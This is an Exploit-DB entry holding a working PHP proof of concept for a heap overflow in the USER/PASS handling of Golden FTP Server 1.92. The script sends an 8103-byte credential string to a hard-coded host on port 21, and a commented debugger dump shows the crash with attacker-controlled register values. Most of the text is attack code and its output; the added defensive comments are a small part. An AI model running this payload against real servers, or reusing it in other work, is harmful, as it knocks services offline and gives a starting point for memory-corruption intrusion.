Golden FTP server 1.92 - 'USER/PASS' Heap Overflow (PoC)
Author: rgod
type: dos
platform: windows
port:
date_added: 2006-12-10
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comGolden_FTP_Server_Pro_v1.92.zip
<?php
#23.07 03/12/2006
#Golden FTP server 1.92 (freeware edition) USER/PASS heap-based overflow PoC
#by rgod retrog at alice dot it
#site: http://retrogod.altervista.org
#download link: http://www.download.com/3000-2160_4-10375602.html?tag=sd.EXAF
# Target of the proof of concept: hard-coded host and port 21 (FTP control channel).
# Defensive note: a USER/PASS argument of roughly 8 KB is far longer than any
# legitimate credential and is straightforward to alert on in FTP logs or at an IDS.
$host="192.168.1.3";
$port="21";
# Build the oversized credential: 8095 filler bytes followed by two 4-byte
# markers whose values reappear in the register dump below (ECX / EDI).
$junk="";
for ($i=1; $i<=8095; $i++){
$junk.="a";
}
$eax="AAAA";
# ord() on a string reads its first byte ('A' = 0x41), so 0x41-20 = 0x2D ('-')
# and $eax becomes "-AAA" -- the "2D 41 41 41" bytes visible in the EDI dump.
$eax[0]=chr(ord($eax)-20); //to have the wanted eax
$ecx="BBBB";
# Final payload is 8095 + 4 + 4 = 8103 bytes; the same string is used for both commands.
$junk.=$ecx.$eax;
# NOTE(review): the @ silences the connect warning; failure is still reported by
# die() below, but $errno/$errstr are collected and never shown.
$sock=@fsockopen($host,$port,$errno, $errstr, 10);
if (!$sock){
die("\nnot connected!\n");
}
else {
# Read the banner (at most 80 bytes), send the oversized USER, read the reply
# (again capped at 80 bytes), send the oversized PASS, then close the socket.
fgets($sock,80);
fputs($sock,"USER ".$junk."\r\n");
fgets($sock,80);
fputs($sock,"PASS ".$junk."\r\n");
fclose($sock);
}
/*
...
17:07:28.144 pid=0870 tid=1128 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00EBFD64: C4 9D A6 00 F4 BF A5 00-00 9F A6 00 BC FD EB 00
ESP=00EBFD1C: 00 00 00 00 58 FD EB 00-61 24 41 00 80 9F A6 00
EBP=00EBFD20: 58 FD EB 00 61 24 41 00-80 9F A6 00 F4 BF A5 00
ESI=004B9F04: 2D 41 41 41 00 00 00 00-00 00 00 00 00 00 00 00
EDI=004B9F00: 42 42 42 42 2D 41 41 41-00 00 00 00 00 00 00 00
EIP=004A9B74: 8B 00 8B 12 E8 5F F6 FD-FF 0F 94 C0 83 E0 01 5B
--> MOV EAX,[EAX]
----------------------------------------------------------------
17:07:28.254 pid=0870 tid=1128 Thread exited with code 0
...
*/
?>
# milw0rm.com [2006-12-11]